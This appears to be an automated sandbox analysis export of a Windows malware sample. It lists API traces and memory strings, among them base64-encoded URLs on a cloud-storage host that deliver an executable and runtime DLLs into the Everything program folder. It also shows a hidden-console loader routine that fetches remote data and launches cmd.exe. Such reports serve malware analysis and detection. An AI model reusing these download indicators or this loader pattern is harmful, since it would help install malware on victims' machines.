aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9QbHVnaW5MYXVuY2hlci5leGU=, xrefs: 00ED2F1F
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcjEyMC5kbGw=, xrefs: 00ED2FC2
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDE0MC5kbGw=, xrefs: 00ED3086
QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTQwLmRsbA==, xrefs: 00ED306F
QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTIwLmRsbA==, xrefs: 00ED2F5B
QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHZjcnVudGltZTE0MC5kbGw=, xrefs: 00ED300D
QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNyMTIwLmRsbA==, xrefs: 00ED2FAB
aHR0cHM6Ly93d3c4MC0xMzIzNTcwOTU5LmNvcy5hcC1zaW5nYXBvcmUubXlxY2xvdWQuY29tL01TQVNOMS5kbGw=, xrefs: 00ED30E8
QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXEV2ZXJ5dGhpbmcuZXhl, xrefs: 00ED2F0B
aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDEyMC5kbGw=, xrefs: 00ED2F6F
QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXGFwcF9jb3JlX2xlZ2FjeS5kbGw=, xrefs: 00ED30D1
C:\Program Files (x86)\Everything, xrefs: 00ED2F00

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: task$Internet$CloseHandleOpen$CreateDirectoryFileRead
String ID: C:\Program Files (x86)\Everything$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXEV2ZXJ5dGhpbmcuZXhl$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTIwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTQwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNyMTIwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXGFwcF9jb3JlX2xlZ2FjeS5kbGw=$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHZjcnVudGltZTE0MC5kbGw=$aHR0cHM6Ly93d3c4MC0xMzIzNTcwOTU5LmNvcy5hcC1zaW5nYXBvcmUubXlxY2xvdWQuY29tL01TQVNOMS5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS92Y3J1bnRpbWUxNDAuZGxs$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9QbHVnaW5MYXVuY2hlci5leGU=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDE0MC5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDEyMC5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcjEyMC5kbGw=
API String ID: 1727112427-3979013470
Opcode ID: 70a9c246538c575121b612c811ff9378ecc0194da8ed47391aa54a3d53c0adee
Instruction ID: d1205ac5575c2dfe60860ea66dfc17227f4ee52b94a0deb176f3176403c35e74
Opcode Fuzzy Hash: 70a9c246538c575121b612c811ff9378ecc0194da8ed47391aa54a3d53c0adee
Instruction Fuzzy Hash: 47513D72C12A09EADB14EBA0CD46BDDBBB4AF10301F9085D9E115372D2EB741F09DB91

Function 00EF427E Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF3F37: CreateFileW.KERNELBASE(00000000,?,?,'C,?,?,00000000,?,00EF4327,?,0000000C), ref: 00EF3F54

GetLastError.KERNEL32 ref: 00EF4392
__dosmaperr.LIBCMT ref: 00EF4399
GetFileType.KERNELBASE(00000000), ref: 00EF43A5
GetLastError.KERNEL32 ref: 00EF43AF
__dosmaperr.LIBCMT ref: 00EF43B8
CloseHandle.KERNEL32(00000000), ref: 00EF43D8
CloseHandle.KERNEL32(00EEACDF), ref: 00EF4525
GetLastError.KERNEL32 ref: 00EF4557
__dosmaperr.LIBCMT ref: 00EF455E

Strings

H, xrefs: 00EF44E3

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d26bd022e760527bfde212b938f28bf76afef4f6de2caf8266c1fa250c7135e0
Instruction ID: 23e9b938a4d650bc9e4f88d014ec30d702deb1fad37be36c18fa9fcbe683e3fe
Opcode Fuzzy Hash: d26bd022e760527bfde212b938f28bf76afef4f6de2caf8266c1fa250c7135e0
Instruction Fuzzy Hash: 5BA14072A1015C9FDF19AF68DC42BBE7BE0AB46324F141259F911FB2E1CB308956CB42

Function 00ED2CB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00ED2CDB

Part of subcall function 00ED2B40: task.LIBCPMTD ref: 00ED2C92

InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00ED2D19
task.LIBCPMTD ref: 00ED2D25
task.LIBCPMTD ref: 00ED2D70
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00ED2DAC
InternetCloseHandle.WININET(00000000), ref: 00ED2DE6
InternetCloseHandle.WININET(00000000), ref: 00ED2E02

Strings

Mozilla/5.0, xrefs: 00ED2CD6

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Internet$task$CloseHandleOpen$FileRead
String ID: Mozilla/5.0
API String ID: 3809162015-2630049532
Opcode ID: 907ebe15de923c219d388daf0b55f3771776829d2b01a55be6bacf922d08cd08
Instruction ID: 862459a57a434781e5e241731a0a25e2d489afed42732bb43cf00777a6538d92
Opcode Fuzzy Hash: 907ebe15de923c219d388daf0b55f3771776829d2b01a55be6bacf922d08cd08
Instruction Fuzzy Hash: 5E415CB1900209AFDB14DF90DD86BEEB7B4EF54700F10425AF615BA2D1DB746A46CB90

Function 00EE9DED Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e1513da631ac8b265df0c7fac9af79835d2516edd87589bca6c4b200ec44a3
Instruction ID: b2adca50b5baf533d5b5e00833dfa47dfdcc5030f51945db64378334e805620f
Opcode Fuzzy Hash: 34e1513da631ac8b265df0c7fac9af79835d2516edd87589bca6c4b200ec44a3
Instruction Fuzzy Hash: 0BB1D2B0A0428D9FDB11DFAAC841BBDBBF1AF45314F186168E505B7392C770A981CB62

Function 00ED34B0 Relevance: 6.0, APIs: 4, Instructions: 19
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00ED34B4
ShowWindow.USER32(?,00000000), ref: 00ED34C3
Sleep.KERNELBASE(00007530), ref: 00ED34CE

Part of subcall function 00ED3150: Sleep.KERNELBASE(00000BB8,?,00EF7223,000000FF), ref: 00ED317C
Part of subcall function 00ED3150: InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 00ED319D
Part of subcall function 00ED3150: InternetOpenUrlA.WININET(00000000,00F0375C,00000000,00000000,80000000,00000000), ref: 00ED31DD
Part of subcall function 00ED3150: InternetCloseHandle.WININET(?), ref: 00ED320E
Part of subcall function 00ED3150: InternetCloseHandle.WININET(?), ref: 00ED3271
Part of subcall function 00ED3150: InternetCloseHandle.WININET(?), ref: 00ED327B
Part of subcall function 00ED3150: InternetReadFile.WININET(00000000,?,00001000,?), ref: 00ED329C

Sleep.KERNEL32(00000BB8), ref: 00ED34DE

Part of subcall function 00ED2E50: GetCurrentProcess.KERNEL32(00000100), ref: 00ED2E5E
Part of subcall function 00ED2E50: SetPriorityClass.KERNEL32(00000000), ref: 00ED2E65
Part of subcall function 00ED2E50: GetCurrentThread.KERNEL32 ref: 00ED2E6D
Part of subcall function 00ED2E50: SetThreadPriority.KERNEL32(00000000), ref: 00ED2E74
Part of subcall function 00ED2E50: SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 00ED2E88
Part of subcall function 00ED2E50: _fwprintf.LIBCONCRTD ref: 00ED2EA2
Part of subcall function 00ED2E50: ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00ED2EC1
Part of subcall function 00ED2E50: ExitProcess.KERNEL32 ref: 00ED2EC9

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Internet$CloseHandleSleep$CurrentOpenPriorityProcessThreadWindow$ChangeClassConsoleExecuteExitFileNotifyReadShellShow_fwprintf
String ID:
API String ID: 96696892-0
Opcode ID: ffa76ca0d15c7579f9ef4a6824fb4c15c5478900ec21d814518ee3c88ee40980
Instruction ID: cae418bb2e0a8d7e849053ff17d0781d5317087d20bd83e47fac9b7e6da84c82
Opcode Fuzzy Hash: ffa76ca0d15c7579f9ef4a6824fb4c15c5478900ec21d814518ee3c88ee40980
Instruction Fuzzy Hash: 65E0CD30500708AFD7406BF1DE0B62D37A8EB44702F000155F705F12A0DE715904C751

Function 00ED3E50 Relevance: 4.6, APIs: 3, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Min_value.LIBCPMTD ref: 00ED3EBD
__fread_nolock.LIBCMT ref: 00ED3F38
__fread_nolock.LIBCMT ref: 00ED3F88

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: __fread_nolock$Min_value
String ID:
API String ID: 3100174245-0
Opcode ID: 3c3749919c9a63ec5bd6beb19ce55b8a7d9094cc88d032b5d89156b829ee7930
Instruction ID: b6695a82091577d6b820d4860dd42ac5a1ab4554ac2a7c5dd59cb3e57531cc2b
Opcode Fuzzy Hash: 3c3749919c9a63ec5bd6beb19ce55b8a7d9094cc88d032b5d89156b829ee7930
Instruction Fuzzy Hash: 7C51D775E0020DEFCB08DFA8C894AEEB7B2EF88304F10916AE915A7345D770AB45DB51

Function 00EE91F2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<, xrefs: 00EE91F4

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-2776746311
Opcode ID: 32fb86a629791c485fa974097c04bff106b8c134cd0c9a4dfdb97ea37cb02bbe
Instruction ID: 31e0c1465622cc7fa2f6c14ac095adf599bc78d8c85ca70146f3fbd338f9d421
Opcode Fuzzy Hash: 32fb86a629791c485fa974097c04bff106b8c134cd0c9a4dfdb97ea37cb02bbe
Instruction Fuzzy Hash: 9551C370A0024CEFDF14DF59C881AADBBE1EF89364F259159F849AB293D3319E41CB90

Function 00ED2B40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

task.LIBCPMTD ref: 00ED2C92

Strings

@, xrefs: 00ED2BA9

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: task
String ID: @
API String ID: 1384045349-2766056989
Opcode ID: f6614dfa00d24dff0cb34bb07e763dfe9b97a4e509c0ef97ded55b7b9f803877
Instruction ID: 3312be25279e1b41b13e229e4cac1c117ce217ad69fb32ad36460b3f1258737d
Opcode Fuzzy Hash: f6614dfa00d24dff0cb34bb07e763dfe9b97a4e509c0ef97ded55b7b9f803877
Instruction Fuzzy Hash: FC413DB1D00549DFCB04DF94D991AEEBBB4FF54310F24925AE5227B391DB342A06CBA0

Function 00ED7DB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 00ED7E37

Strings

jN, xrefs: 00ED7DD5, 00ED7DF5, 00ED7DFD, 00ED7E18

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Concurrency::cancellation_token_source::~cancellation_token_source
String ID: jN
API String ID: 2028376226-441998628
Opcode ID: e807caf2cac7e5e9d48d971106de2187dd2ca0962f78cf92490e8ecbcfdbf051
Instruction ID: e712f63c8aac7492a1299da35ed7f63257c47f2e3b87920d3ca54253b0369900
Opcode Fuzzy Hash: e807caf2cac7e5e9d48d971106de2187dd2ca0962f78cf92490e8ecbcfdbf051
Instruction Fuzzy Hash: BB11D7B5D00209ABCB04DF98C951BAEBBB5EB48710F10825DE519B7390DB34AA41CBA1

Function 00EF3F37 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,?,'C,?,?,00000000,?,00EF4327,?,0000000C), ref: 00EF3F54

Strings

'C, xrefs: 00EF3F48

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: CreateFile
String ID: 'C
API String ID: 823142352-1213274369
Opcode ID: 3e3bbcbd9e405c7ad166458f9bb05aafc7eee938bdd399e0c80ef91d082bca67
Instruction ID: da0812e263b75e99e1d32ae1a8edf8fae9bd009790050dae2bf42c3606203dd1
Opcode Fuzzy Hash: 3e3bbcbd9e405c7ad166458f9bb05aafc7eee938bdd399e0c80ef91d082bca67
Instruction Fuzzy Hash: 2BD06C3211010DBFDF029F85DD06EDA3BAAFB88754F014000BA1866020CB32E821EB94

Function 00EE70F5 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EE680B: GetConsoleOutputCP.KERNEL32(9B965E69,00000000,00000000,?), ref: 00EE686E

WriteFile.KERNELBASE(?,00000000,00EE0F0F,?,00000000,00000000,00000000,?,00000000,?,00ED96B4,00EE0F0F,00000000,00ED96B4,?,?), ref: 00EE727A
GetLastError.KERNEL32(?,00EE0F0F,00000000,?,00ED96B4,?,00000000,00000000), ref: 00EE7284

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: c50cd77f35487f702d5b33e4f40e2afaf6f158e042a91c5bb2dab8816e4cc804
Instruction ID: 7d54fdedd7762829c639e3b435b0fcbce7ae9e905e692022a93906a4b3f63c20
Opcode Fuzzy Hash: c50cd77f35487f702d5b33e4f40e2afaf6f158e042a91c5bb2dab8816e4cc804
Instruction Fuzzy Hash: 9061B0B190829DAFDF11DFAAC844AEEBBB9AF19308F141185F980B7255D731D901DB60

Function 00EE65B0 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00EE65FC
GetFileType.KERNELBASE(00000000), ref: 00EE660E

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 6fa354799426c2af28073a2bbbc361eadfc821fd6237303d73294c5ec94e6e56
Instruction ID: efe683966f2c04d5e9a861463227ddbfeae324ffbc217b0f36b9f1fbe5548891
Opcode Fuzzy Hash: 6fa354799426c2af28073a2bbbc361eadfc821fd6237303d73294c5ec94e6e56
Instruction Fuzzy Hash: B8119A71214BD646C7304F3F8C98522BA94A7B63B8B381B2ED0B7A75F5CB30D94AD641

Function 00EEA29D Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00F057D8,00ED96B4,00000002,00ED96B4,00000000,?,?,?,00EEA3A7,00000000,?,00ED96B4,00000002,00F057D8), ref: 00EEA2D9
GetLastError.KERNEL32(00ED96B4,?,?,?,00EEA3A7,00000000,?,00ED96B4,00000002,00F057D8,00000000,00ED96B4,00000000,00F057D8,0000000C,00EE0FE6), ref: 00EEA2E6

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: bae9cd6590efa325e5d70be5ab9230d0e2af9427c8f0853173c9b16b53901bc1
Instruction ID: b73cf00109ba6d12fe9e690c0b80eebec4e6bbfcda4025e1030d743ce2946779
Opcode Fuzzy Hash: bae9cd6590efa325e5d70be5ab9230d0e2af9427c8f0853173c9b16b53901bc1
Instruction Fuzzy Hash: E5014E32600559AFCB058F56DC05DDE3F69EB85330B280258F901B72A1EE71ED41CB90

Function 00EE7311 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00EEFB34,00EDDD01,00000000,00EDDD01,?,00EEFDD5,00EDDD01,00000007,00EDDD01,?,00EF02C9,00EDDD01,00EDDD01), ref: 00EE7327
GetLastError.KERNEL32(00EDDD01,?,00EEFB34,00EDDD01,00000000,00EDDD01,?,00EEFDD5,00EDDD01,00000007,00EDDD01,?,00EF02C9,00EDDD01,00EDDD01), ref: 00EE7332

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: a8fa78ca2051836dd17c06c7fdeb626d2fb77717f9700b796b2b1e4f94532494
Instruction ID: b9ef9d2feb61f5755b6af3ca6f5f284be49fe4e5554a6bfeebce69bc88cbd449
Opcode Fuzzy Hash: a8fa78ca2051836dd17c06c7fdeb626d2fb77717f9700b796b2b1e4f94532494
Instruction Fuzzy Hash: A7E0C23250424CABCF612FE2EC09B993FA9AF40796F105060FA08FA0B0DE3088D5D7C0

Function 00ED37F0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00ED6330: std::ios_base::clear.LIBCPMTD ref: 00ED6361

fpos.LIBCPMTD ref: 00ED389A

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: fposstd::ios_base::clear
String ID:
API String ID: 1508181384-0
Opcode ID: f50348f78d37e3508cedee8f669624e2ad31b087f787502b8019bf2b28877518
Instruction ID: 017a1a6df77d7023f3d885438c3f7cd0bb5cc306811cdf7c5db3de59f3cf8de6
Opcode Fuzzy Hash: f50348f78d37e3508cedee8f669624e2ad31b087f787502b8019bf2b28877518
Instruction Fuzzy Hash: D2311DB5A006199FCB04DFA4C991BBEB7B1FF88710F108619E5257B391CB31A901CB90

Function 00ED4B50 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00ED4B8A

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

